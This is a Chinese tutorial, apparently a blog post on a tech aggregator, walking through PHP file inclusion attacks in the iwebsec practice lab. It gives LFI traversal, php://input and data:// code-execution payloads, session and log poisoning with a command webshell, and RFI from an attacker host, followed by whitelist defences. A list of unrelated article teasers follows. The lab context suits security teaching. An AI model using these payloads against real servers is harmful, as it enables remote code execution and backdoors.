PHP 文件包含漏洞实战:iwebsec 靶场 10 关核心绕过手法与伪协议利用

发布时间:2026/7/8 20:29:03

PHP 文件包含漏洞实战:iwebsec 靶场 10 关核心绕过手法与伪协议利用
PHP 文件包含漏洞实战iwebsec 靶场 10 关核心绕过手法与伪协议利用在 Web 安全领域文件包含漏洞File Inclusion Vulnerability一直是渗透测试中的高频攻击点。这种漏洞允许攻击者通过动态包含恶意文件来执行任意代码或读取敏感数据。本文将基于 iwebsec 靶场系统化剖析 10 种典型文件包含场景的绕过手法与伪协议利用技巧。1. 靶场环境快速搭建iwebsec 靶场提供 Docker 化部署方案执行以下命令即可启动环境docker pull iwebsec/iwebsec docker run -d -p 8001:80 --name iwebsec iwebsec/iwebsec关键目录结构说明/var/www/html/fi/文件包含漏洞实验脚本/var/lib/php/session/PHP Session 存储目录/etc/php/7.4/apache2/php.iniPHP 配置文件提示实验前建议修改 php.ini 的以下参数allow_url_fopen Onallow_url_include Onsession.save_path /var/lib/php/session2. 基础文件包含漏洞原理PHP 文件包含主要通过四个函数实现函数区别错误处理include()包含失败仅警告继续执行require()包含失败致命错误终止执行include_once()避免重复包含继续执行require_once()避免重复包含终止执行典型漏洞代码示例?php $file $_GET[file]; include($file); ?3. 本地文件包含LFI实战3.1 基础文件读取直接包含系统敏感文件/fi/01.php?filename../../../../etc/passwd常见敏感文件路径- Linux: - /etc/passwd - /proc/self/environ - /var/log/apache2/access.log - Windows: - C:\Windows\win.ini - C:\xampp\apache\conf\extra\httpd-xampp.conf3.2 路径遍历绕过当过滤../时尝试以下变种/fi/02.php?filename....//....//....//etc/passwd编码绕过方案# URL 双重编码 print(quote(quote(../../../../etc/passwd))) # 输出%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252Fpasswd4. 伪协议深度利用4.1 php://filter 源码读取通过 base64 编码读取 PHP 文件源码/fi/06.php?filenamephp://filter/convert.base64-encode/resourceindex.php解码获取源码echo PD9waHA... | base64 -d4.2 php://input 代码执行POST 方式提交恶意代码GET /fi/08.php?filenamephp://input HTTP/1.1 Host: target.com ?php system(id);?4.3 data:// 直接执行Base64 编码执行/fi/10.php?filenamedata://text/plain;base64,PD9waHAgc3lzdGVtKCJpZCIpOz8原始数据执行/fi/10.php?filenamedata://text/plain,?php phpinfo();?5. 高级绕过技术5.1 Session 文件包含利用流程注入 PHP 代码到 Session/fi/03.php?iwebsec?php system($_GET[cmd]);?获取 Session IDPHPSESSID包含 Session 文件/fi/01.php?filename../../../../var/lib/php/session/sess_[PHPSESSID]5.2 日志文件注入Apache 日志注入步骤伪造包含 PHP 代码的请求GET /?php phpinfo();? HTTP/1.1 Host: target.com包含日志文件/fi/01.php?filename../../../../var/log/apache2/access.log5.3 远程文件包含RFI基础利用/fi/04.php?filenamehttp://attacker.com/shell.txt绕过限制技巧使用问号截断/fi/05.php?filenamehttp://attacker.com/shell.txt?使用井号截断/fi/05.php?filenamehttp://attacker.com/shell.txt%236. 防御方案对比防御措施有效性实施成本备注白名单校验★★★★★中需维护合法文件列表禁用危险函数★★★★低影响正常功能目录限制★★★低可能被绕过文件内容校验★★高性能影响较大推荐加固代码示例$allowed [header.php, footer.php]; if(in_array($_GET[file], $allowed)) { include($_GET[file]); } else { die(Invalid file!); }7. 自动化测试方案使用 Python 实现基础检测import requests targets [ /fi/01.php?filename../../../../etc/passwd, /fi/06.php?filenamephp://filter/convert.base64-encode/resourceindex.php ] for url in targets: r requests.get(fhttp://target.com{url}) if root:x:0:0 in r.text or PD9waHA in r.text: print(f[] Vulnerable: {url})8. 实战经验总结信息收集优先通过phpinfo()确认allow_url_include和session.save_path等关键配置组合利用技巧文件上传 文件包含 GetshellLFI 日志文件 RCESession 包含 代码注入 持久化后门绕过思维导图[过滤../] -- 使用....// -- URL编码 -- 超长路径截断 [限制后缀] -- %00截断(PHP5.3) -- 问号截断 -- 伪协议绕过在真实渗透测试中文件包含漏洞往往需要结合具体环境特征进行变异利用。建议在掌握基础手法后通过修改请求头、尝试非常规路径等方式进行深度测试。

相关新闻

3 款主流反作弊软件报错对比:EAC 30005、BattlEye、VAC 的成因与修复差异

3 款主流反作弊软件报错对比:EAC 30005、BattlEye、VAC 的成因与修复差异

2026/7/8 20:19:03

主流游戏反作弊系统报错深度解析:EAC、BattlEye与VAC的故障处理指南当你在深夜终于结束工作,准备打开心爱的游戏放松片刻,却遭遇"Error 30005: Create File Failed With 32"的冰冷提示——这种挫败感每位PC玩家都深有体会。反作弊系…

ASP.NET/PHP/JSP 3大平台Cookie注入防御:从Request对象到参数化查询

ASP.NET/PHP/JSP 3大平台Cookie注入防御:从Request对象到参数化查询

2026/7/8 20:19:03

ASP.NET/PHP/JSP 3大平台Cookie注入防御:从Request对象到参数化查询在Web应用开发中,安全性始终是开发者需要面对的首要挑战之一。Cookie注入作为一种特殊的SQL注入形式,往往因为其隐蔽性而被开发者忽视。本文将深入探讨ASP.NET、PHP和JSP三大…

如何用FanControl彻底告别电脑风扇噪音,实现智能温控?

如何用FanControl彻底告别电脑风扇噪音,实现智能温控?

2026/7/8 20:19:03

如何用FanControl彻底告别电脑风扇噪音,实现智能温控? 【免费下载链接】FanControl.Releases This is the release repository for Fan Control, a highly customizable fan controlling software for Windows. 项目地址: https://gitcode.com/GitHub_…

Adobe Illustrator批量替换革命:3分钟掌握ReplaceItems.jsx完整指南

Adobe Illustrator批量替换革命:3分钟掌握ReplaceItems.jsx完整指南

2026/7/8 21:49:06

Adobe Illustrator批量替换革命:3分钟掌握ReplaceItems.jsx完整指南 【免费下载链接】illustrator-scripts Adobe Illustrator scripts 项目地址: https://gitcode.com/gh_mirrors/il/illustrator-scripts 还在为Adobe Illustrator中重复的设计元素替换工作感…

计算机毕业设计之基于SSM框架的果蔬管理系统设计与实现

计算机毕业设计之基于SSM框架的果蔬管理系统设计与实现

2026/7/8 21:49:06

基于SSM框架的果蔬管理系统,采用Java语言开发,并结合MySQL数据库技术,是针对果蔬行业管理需求而设计的高效信息化解决方案。该系统整合了Spring的依赖注入与AOP特性、SpringMVC的请求处理能力以及MyBatis对数据库的高效操作,实现了…

软件测试入门——第二十九课(Linux常用命令)

软件测试入门——第二十九课(Linux常用命令)

2026/7/8 21:49:06

一、Linux关闭防火墙 外网访问服务器时,需要关闭防火墙,才能不受端口限制。但是生产环境中,关闭防火墙是一种非常危险的事情,这时可以仅开启指定的端口。 1.永久生效 开启: chkconfig iptables on 关闭: chkconfig iptables off 2.即刻生效 开启: service iptables sta…

CVAT v2.69.0 多平台部署对比:Ubuntu 22.04 vs Windows 10 WSL2 实测 5 大差异点

CVAT v2.69.0 多平台部署对比:Ubuntu 22.04 vs Windows 10 WSL2 实测 5 大差异点

2026/7/8 21:49:06

CVAT v2.69.0 多平台部署深度评测:Ubuntu原生环境与Windows WSL2的5大核心差异解析1. 部署架构与系统要求对比在计算机视觉标注工具CVAT的部署场景中,操作系统选择直接影响后续使用体验。我们针对Ubuntu 22.04原生环境和Windows 10 WSL2两种典型部署方案…

LIDA 与 GPT-3.5/4 对比评测:3个数据集下的可视化错误率与质量分析

LIDA 与 GPT-3.5/4 对比评测:3个数据集下的可视化错误率与质量分析

2026/7/8 21:49:06

LIDA与GPT-3.5/4可视化生成能力深度评测:三大数据集下的错误率与质量分析1. 评测背景与核心问题当数据科学家面对一个新的数据集时,第一步往往是探索性数据分析(EDA),而可视化是这一过程中最直观的工具。传统可视化工具…

AI大模型就业:想写进简历,先把这个闭环补上

AI大模型就业:想写进简历,先把这个闭环补上

2026/7/8 21:39:06

聊《AI大模型就业:想写进简历,先把这个闭环补上》之前,先说一句实在的:别急着背概念,先看它在真实项目里到底解决什么问题。 摘要 先把这篇文章的目标说清楚:看完之后,你应该能判断这件事值不…

解锁AMD Ryzen处理器深层性能:SMU Debug Tool完全指南

解锁AMD Ryzen处理器深层性能:SMU Debug Tool完全指南

2026/7/8 0:44:47

解锁AMD Ryzen处理器深层性能:SMU Debug Tool完全指南 【免费下载链接】SMUDebugTool A dedicated tool to help write/read various parameters of Ryzen-based systems, such as manual overclock, SMU, PCI, CPUID, MSR and Power Table. 项目地址: https://gi…

6个月转型AI工程师:实战路径与核心技能

6个月转型AI工程师:实战路径与核心技能

2026/7/8 6:29:42

1. 项目概述:6个月转型AI工程师的可行性路径在2023年大模型技术爆发的背景下,AI工程师岗位需求同比增长217%(LinkedIn数据)。不同于传统算法工程师需要3-5年培养周期,现代AI工程师更侧重工程化落地能力。我在硅谷科技公…

YOLOv5模型剪枝与量化实战:边缘设备部署优化

YOLOv5模型剪枝与量化实战:边缘设备部署优化

2026/7/8 14:04:34

1. 项目背景与核心价值在计算机视觉领域,YOLOv5因其出色的实时检测性能成为工业界宠儿。但当我们尝试将其部署到边缘设备(如树莓派、Jetson Nano或手机终端)时,立刻会遇到两个致命问题:模型体积庞大(原始YO…

Qwen Code+Obsidian构建可执行的AI时代认知操作系统

Qwen Code+Obsidian构建可执行的AI时代认知操作系统

2026/7/8 0:07:15

1. 项目概述:这不是又一个笔记软件教程,而是一套可复用的“认知操作系统”搭建逻辑你有没有试过,在读完Andrej Karpathy那篇著名的《Software 2.0》之后,满脑子都是“神经网络即代码”的震撼,但合上网页,打…

校园服饰细分赛道测算程序,学生平价国风,机能穿搭市场规模预估。

校园服饰细分赛道测算程序,学生平价国风,机能穿搭市场规模预估。

2026/7/8 0:07:15

校园服饰细分赛道测算程序(Python)——学生平价国风 & 机能穿搭市场规模预估(TAM / SAM / SOM)一、实际应用场景描述(真实业务抽象)在《时尚产业与品牌创新》课程中,细分市场切入&#xff0…

Visual C++运行库完整解决方案:告别软件兼容性问题

Visual C++运行库完整解决方案:告别软件兼容性问题

2026/7/8 0:07:15

Visual C运行库完整解决方案:告别软件兼容性问题 【免费下载链接】vcredist AIO Repack for latest Microsoft Visual C Redistributable Runtimes 项目地址: https://gitcode.com/gh_mirrors/vc/vcredist 你是否曾为打开游戏时弹出的"DLL缺失"错误…